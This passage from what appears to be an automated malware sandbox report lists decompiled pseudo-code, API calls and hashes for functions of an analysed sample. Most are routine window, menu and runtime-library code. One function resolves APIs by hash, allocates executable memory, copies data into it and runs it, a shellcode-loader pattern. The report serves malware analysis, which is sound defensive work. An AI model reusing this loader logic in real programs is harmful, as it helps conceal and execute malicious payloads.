                    • Part of subcall function 0042143D: DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                    • Part of subcall function 0042143D: GetWindowRect.USER32 ref: 0042146C
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214AC
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214D2
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421512
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421534
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00407505
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction ID: a7cd9ca6abd962d82728a90d354626cd2234a4d826fdd58f6502a378ddc358a9
                  • Opcode Fuzzy Hash: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction Fuzzy Hash: BEF0A0B2204205BBC7215F19DC85FC2BFA4EF54360F24012AF694572A1C776A880C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404CB4, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404CB4(intOrPtr* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr* _t20;

				_t20 = __ecx;
				_t6 = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) == 0) {
					_t6 = E004049DB(_t9, GetMenuItemCount( *( *((intOrPtr*)( *__ecx + 0x6c))() + 4)));
				}
				return  *((intOrPtr*)( *_t20 + 0x194))(_a4, _t6);
			}





                  0x00404cba
                  0x00404cbc
                  0x00404cc1
                  0x00404cd9
                  0x00404cde
                  0x00404cef

                  APIs
                  • GetMenuItemCount.USER32 ref: 00404CCE
                    • Part of subcall function 004049DB: GetSubMenu.USER32 ref: 004049E6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CountItem
                  • String ID:
                  • API String ID: 3435231853-0
                  • Opcode ID: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction ID: 2bd0770f7da49b8842ae51bb064b07c5258a274e3421cbc5c2ea82824ae108bd
                  • Opcode Fuzzy Hash: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction Fuzzy Hash: 35E06D72200104AFD7106B25C808C7ABBAAEF94321301403BF949C3210CB349C529B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041481D, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041481D(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				void* __edi;
				intOrPtr* _t11;
				void* _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t18 = _a4;
				_t17 = __ecx;
				if(_t18 >= 0) {
					_t11 = E0043108C(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
					if(_t11 == 0) {
						goto L1;
					}
					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
					 *_t11 = _t17;
					 *((intOrPtr*)(_t11 + 0xc)) = 1;
					 *((intOrPtr*)(_t11 + 8)) = _t18;
					return _t11;
				}
				L1:
				return 0;
			}









                  0x00414823
                  0x00414827
                  0x0041482b
                  0x0041483c
                  0x00414844
                  0x00000000
                  0x00000000
                  0x00414846
                  0x0041484a
                  0x0041484c
                  0x00414853
                  0x00000000
                  0x00414853
                  0x0041482d
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _malloc
                  • String ID:
                  • API String ID: 1579825452-0
                  • Opcode ID: dd6bd1b736eb428f6ac66092488aa0dafb57e017dd4b37dcf2df1ae9fd136421
                  • Instruction ID: af9e8d2a6ecd8cac88a5fa1c94de59ea43d9a8c68d6b0a2cc1d4c79a81d680ff
                  • Opcode Fuzzy Hash: dd6bd1b736eb428f6ac66092488aa0dafb57e017dd4b37dcf2df1ae9fd136421
                  • Instruction Fuzzy Hash: 34E06D765006169BC7009F4AD504A86BBECEFA1375F16846BE408CB662C675E885CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040547D, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040547D(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t5;
				void* _t13;
				intOrPtr _t14;
				intOrPtr* _t16;

				_t16 = __ecx;
				_t5 = E0040ED96(__ecx, __eflags);
				if(_t5 != 0) {
					_t14 = _a4;
					 *((intOrPtr*)( *_t16 + 0x64))(_t14, _t13);
					SetWindowLongA( *(_t16 + 0x20), 0xffffffec,  *(_t14 + 0x2c)); // executed
					return 1;
				}
				return _t5;
			}







                  0x00405483
                  0x00405485
                  0x0040548c
                  0x00405491
                  0x00405497
                  0x004054a2
                  0x00000000
                  0x004054ab
                  0x004054ae

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LongWindow
                  • String ID:
                  • API String ID: 1378638983-0
                  • Opcode ID: 5db1cf8e091e2c8a437a7c27e64b2570dcc467992d3ac8b88cd9058fe1aa6147
                  • Instruction ID: 810bde46e47805890040c907d9e550c609abfaacfc61c2af389d08159f719c5e
                  • Opcode Fuzzy Hash: 5db1cf8e091e2c8a437a7c27e64b2570dcc467992d3ac8b88cd9058fe1aa6147
                  • Instruction Fuzzy Hash: 2AE086332101146BC7106BAADC04C4BBFADEFEA3317050537F655D3161CA75D8118B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040451B, Relevance: 1.5, APIs: 1, Instructions: 20windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040451B(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t15;

				_t15 = __ecx;
				_t7 = E0040ACDF(_t11, __ecx, _t13, _t14, __ecx, __eflags, _a4, _a8, _a12, _a16); // executed
				if(_t7 != 0) {
					 *((intOrPtr*)(_t15 + 0x5c)) = GetMenu( *(__ecx + 0x20));
					return 1;
				}
				return _t7;
			}










                  0x00404524
                  0x0040452f
                  0x00404536
                  0x00404541
                  0x00000000
                  0x00404546
                  0x00404549

                  APIs
                    • Part of subcall function 0040ACDF: __EH_prolog3.LIBCMT ref: 0040ACE6
                  • GetMenu.USER32(?), ref: 0040453B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  • Opcode ID: 66df6734f36cd05d173709c3a8e51ce962251809194cf71b69e651ed303963b6
                  • Instruction ID: e77aef2fb446fdbe468449979d8eaaa0d22de51c12c1053e944ad6392ff2d827
                  • Opcode Fuzzy Hash: 66df6734f36cd05d173709c3a8e51ce962251809194cf71b69e651ed303963b6
                  • Instruction Fuzzy Hash: 2CE0EC36400258BFDB119F62DC048AB7FAAFF45365B05443AB95992160E772D830EB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043ABB6, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0043ABB6(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x466eac = _t6;
				if(_t6 != 0) {
					 *0x468784 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                  0x0043abcb
                  0x0043abd1
                  0x0043abd8
                  0x0043abdf
                  0x0043abe5
                  0x0043abdb
                  0x0043abdb
                  0x0043abdb

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0043ABCB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 397268e2361d87a014e1d1895c26ec71cdc79384a3b682af9213abaf7b095825
                  • Instruction ID: adcfc2ec59f8131cad79dbeede6f75f469dde3a6a742d11a41e180f43ac4c6ee
                  • Opcode Fuzzy Hash: 397268e2361d87a014e1d1895c26ec71cdc79384a3b682af9213abaf7b095825
                  • Instruction Fuzzy Hash: A5D0A7766903485EEB105F71BC08B233BDCD384795F144436FA0CC6190F6F5D550EA09
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00430AD2, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00430AD2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t9;
				void* _t18;

				_push(0xc);
				_push(0x45de98);
				E00431818(__ebx, __edi, __esi);
				E004339CB();
				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
				_t9 = E004309E7(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
				 *(_t18 - 4) = 0xfffffffe;
				E00430B08();
				return E0043185D( *((intOrPtr*)(_t18 - 0x1c)));
			}





                  0x00430ad2
                  0x00430ad4
                  0x00430ad9
                  0x00430ade
                  0x00430ae3
                  0x00430aea
                  0x00430af0
                  0x00430af3
                  0x00430afa
                  0x00430b07

                  APIs
                    • Part of subcall function 004339CB: __lock.LIBCMT ref: 004339CD
                  • __onexit_nolock.LIBCMT ref: 00430AEA
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 004309F6
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 00430A06
                    • Part of subcall function 004309E7: __msize.LIBCMT ref: 00430A24
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A48
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A5E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A70
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A7E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A89
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                  • String ID:
                  • API String ID: 1316407801-0
                  • Opcode ID: a216f9923c9975a0f317412ad0bce5b59f46745d06f6589707a2665974790f42
                  • Instruction ID: 6d8d4708de4b9a91417e96c5bd7686bfa658171a6882dda3d32428defeeee52c
                  • Opcode Fuzzy Hash: a216f9923c9975a0f317412ad0bce5b59f46745d06f6589707a2665974790f42
                  • Instruction Fuzzy Hash: 27D017B1841204EADB10BBAACC0378DBA60AF49319F60921EB021660E2CB7C1A018B0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412C34, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00412C34(void* __ecx, int _a4) {
				int _t7;

				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x50)))) + 0xa0)));
				}
				_t7 = ShowWindow( *(__ecx + 0x20), _a4); // executed
				return _t7;
			}




                  0x00412c3d
                  0x00412c55
                  0x00412c55
                  0x00412c45
                  0x00412c4c

                  APIs
                  • ShowWindow.USER32(?,?,?,004050C1,00000001), ref: 00412C45
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: c4bc1a37b7502a52d234633a370e0309815108f442178a029fe1d30a7837fec8
                  • Instruction ID: b808e145f8c4c1f72aae7c75721f5196043c7ac8eaefe8ca5c15e3459cb75938
                  • Opcode Fuzzy Hash: c4bc1a37b7502a52d234633a370e0309815108f442178a029fe1d30a7837fec8
                  • Instruction Fuzzy Hash: 33D05E36100648DFC7048B00D508BB537A5FB54315F5000A9E5080E532C7339862CB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004085AB, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E004085AB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v20;
				intOrPtr _t8;
				void* _t9;
				intOrPtr _t15;
				intOrPtr _t19;

				_t21 = __esi;
				_t20 = __edi;
				_t18 = __ecx;
				_t17 = __ebx;
				_t8 =  *((intOrPtr*)(__ecx + 0xd4));
				if(_t8 != 1) {
					__eflags = _t8 - 2;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(__ecx + 0xd8)));
						goto L8;
					} else {
						_push(__ecx);
						_v8 = 0x462598;
						E00430CF4( &_v8, 0x45b30c);
						asm("int3");
						_push(4);
						E00431A9B(E0044AC81, __ebx, __edi, __esi);
						_t19 = E00420529(0x104);
						_v20 = _t19;
						_t15 = 0;
						_v8 = 0;
						if(_t19 != 0) {
							_t15 = E0041EC43(_t19);
						}
						return E00431B73(_t15);
					}
				} else {
					_push(GetMenu( *(__ecx + 0x20)));
					L8:
					_t9 = E0041F4E8(_t17, _t18, _t20, _t21, __eflags); // executed
					return _t9;
				}
			}









                  0x004085ab
                  0x004085ab
                  0x004085ab
                  0x004085ab
                  0x004085ab
                  0x004085b4
                  0x004085c2
                  0x004085c5
                  0x004085cc
                  0x00000000
                  0x004085c7
                  0x0040643b
                  0x00406445
                  0x0040644c
                  0x00406451
                  0x00406452
                  0x00406459
                  0x00406468
                  0x0040646a
                  0x0040646d
                  0x0040646f
                  0x00406474
                  0x00406476
                  0x00406476
                  0x00406480
                  0x00406480
                  0x004085b6
                  0x004085bf
                  0x004085d2
                  0x004085d2
                  0x004085d7
                  0x004085d7

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu
                  • String ID:
                  • API String ID: 3711407533-0
                  • Opcode ID: 7a8d6883986902a76e0a4b941a5239b94e62478ace76e4674834ef28fa068524
                  • Instruction ID: 212a02c67525b04f8061536d9f402557b92849d6adee2e2fba0ca1320a023372
                  • Opcode Fuzzy Hash: 7a8d6883986902a76e0a4b941a5239b94e62478ace76e4674834ef28fa068524
                  • Instruction Fuzzy Hash: 36D0C970510101BFCA315B448E499563666BB25304FA5447BE14BB80A2CA3B8CA3AB29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004044B6, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004044B6(void* __ecx, int _a4, int _a8, long _a12) {
				long _t6;

				_t6 = DefFrameProcA( *(__ecx + 0x20),  *(__ecx + 0xe8), _a4, _a8, _a12); // executed
				return _t6;
			}




                  0x004044cd
                  0x004044d4

                  APIs
                  • DefFrameProcA.USER32(?,?,?,?,?), ref: 004044CD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FrameProc
                  • String ID:
                  • API String ID: 3341528880-0
                  • Opcode ID: a1ac97ca6e6fa3ef207845b2f73191d6b332b135f83fdb9d2792b99261401ce9
                  • Instruction ID: 761935b3b5861f7f41f0d66eba6b8c0e881f5c6a5c97450171930e68cced642d
                  • Opcode Fuzzy Hash: a1ac97ca6e6fa3ef207845b2f73191d6b332b135f83fdb9d2792b99261401ce9
                  • Instruction Fuzzy Hash: 81D0EA77000148FBCF025F82DC08D9A7F2AFB99365F558569FA1D090328B339572EB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404644, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404644(void* __ecx, int _a4, int _a8, long _a12) {
				long _t5;

				_t5 = DefMDIChildProcA( *(__ecx + 0x20), _a4, _a8, _a12); // executed
				return _t5;
			}




                  0x00404655
                  0x0040465c

                  APIs
                  • DefMDIChildProcA.USER32(?,?,?,?), ref: 00404655
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ChildProc
                  • String ID:
                  • API String ID: 2769581038-0
                  • Opcode ID: f4bc7cf18c1a03e49df77973594172dd1ce020d0782857df20642151823b36cd
                  • Instruction ID: 77bd7395ef173343b399dfab2321bc704dceaae62940af897972e085eed1b4c0
                  • Opcode Fuzzy Hash: f4bc7cf18c1a03e49df77973594172dd1ce020d0782857df20642151823b36cd
                  • Instruction Fuzzy Hash: 32C00237000148FB8F025F82DC04C9A7F2AFBA9361B558015FA180943187339531EB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00435EE6, Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00435EE6() {
				void* _t1;

				_t1 = E00435E74(0); // executed
				return _t1;
			}




                  0x00435ee8
                  0x00435eee

                  APIs
                  • __encode_pointer.LIBCMT ref: 00435EE8
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E86
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000006,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E9D
                    • Part of subcall function 00435E74: RtlEncodePointer.NTDLL(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435EDB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction ID: 17cc3f827ce23fb23929f520a180e9886f633758a1a1239f613e605e914001a9
                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004037C0, Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E004037C0(intOrPtr __edx, void* __eflags) {
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				short _v56;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t18;
				intOrPtr* _t20;
				intOrPtr* _t22;
				intOrPtr* _t24;
				void* _t26;
				long _t27;
				void* _t30;
				intOrPtr _t31;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t46;
				intOrPtr _t51;
				void* _t55;
				void* _t56;
				void* _t59;
				long _t60;
				void* _t63;
				void* _t73;
				void* _t76;
				void* _t80;

				_t80 = __eflags;
				_t51 = __edx;
				E00403340(E00403130(0x4674a0, 0x44f0f5), _t80, 0xa);
				E00402F80(_t14);
				_t18 = E00403690(E004035A0(_t51, 0), 0x3e006b7a);
				_t20 = E00403690(E004035A0(_t51, 0), 0x92ffa82f);
				_t22 = E00403690(E004035A0(_t51, 0), 0xc319fa22);
				_t24 = E00403690(E004035A0(_t51, 0), 0x49b3b7c3);
				_t59 =  *_t18(0, 0x29a, 0xa);
				_t26 =  *_t20(0, _t59);
				_t27 =  *_t22(0, _t59);
				_t60 = _t27;
				_t46 =  *_t24(_t26);
				_t30 = E00402EF0( &_v64, 0x2b0, 0);
				_t73 = _t63 + 0x44;
				if( *((intOrPtr*)(_t30 + 0x18)) < 8) {
					_t31 = _t30 + 4;
					__eflags = _t31;
				} else {
					_t31 =  *((intOrPtr*)(_t30 + 4));
				}
				_push(_t31);
				_t32 = E00430D56();
				_t34 = E00403690(E004035A0(_t51, 0), _t32);
				_t76 = _t73 + 0x10;
				_t55 = _t34;
				_t82 = _v36 - 8;
				if(_v36 >= 8) {
					E00404490(_t46, _t55, _t60, _t82, _v56);
					_t76 = _t76 + 4;
				}
				_v36 = 7;
				_v40 = 0;
				_v56 = 0;
				_t35 = VirtualAlloc(0, _t60, 0x1000, 0x40); // executed
				_t56 = _t35;
				E004311E0(_t46, _t56, _t60, _t56, _t46, _t60);
				_t38 = E00402EF0( &_v60, 0x18d, 0);
				if( *((intOrPtr*)(_t38 + 0x18)) < 8) {
					_t39 = _t38 + 4;
					__eflags = _t38 + 4;
				} else {
					_t39 =  *((intOrPtr*)(_t38 + 4));
				}
				E00403700(_t39, _t56, _t60);
				_t84 = _v36 - 8;
				if(_v36 >= 8) {
					E00404490(_t46, _t56, _t60, _t84, _v56);
				}
				 *_t56();
				return 0;
			}


































                  0x004037c0
                  0x004037c0
                  0x004037df
                  0x004037e6
                  0x004037fb
                  0x00403815
                  0x0040382f
                  0x00403849
                  0x0040385e
                  0x00403863
                  0x0040386a
                  0x0040386d
                  0x00403873
                  0x0040387f
                  0x00403889
                  0x0040388f
                  0x00403896
                  0x00403896
                  0x00403891
                  0x00403891
                  0x00403891
                  0x00403899
                  0x0040389a
                  0x004038ae
                  0x004038b3
                  0x004038b6
                  0x004038b8
                  0x004038bc
                  0x004038c3
                  0x004038c8
                  0x004038c8
                  0x004038d6
                  0x004038de
                  0x004038e6
                  0x004038eb
                  0x004038ee
                  0x004038f2
                  0x00403903
                  0x0040390e
                  0x00403915
                  0x00403915
                  0x00403910
                  0x00403910
                  0x00403910
                  0x0040391b
                  0x00403923
                  0x00403927
                  0x0040392e
                  0x00403933
                  0x00403936
                  0x00403941

                  APIs
                    • Part of subcall function 004035A0: __wcslwr.LIBCMT ref: 0040362D
                    • Part of subcall function 00402EF0: LoadStringW.USER32(?,00000000,?,00000000), ref: 00402F0C
                  • VirtualAlloc.KERNELBASE ref: 004038EB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocLoadStringVirtual__wcslwr
                  • String ID:
                  • API String ID: 3774548895-0
                  • Opcode ID: 1592d7604d7e71ef99574a7cbd0b9e400da60f1e698cbef6546b2b55b08ba799
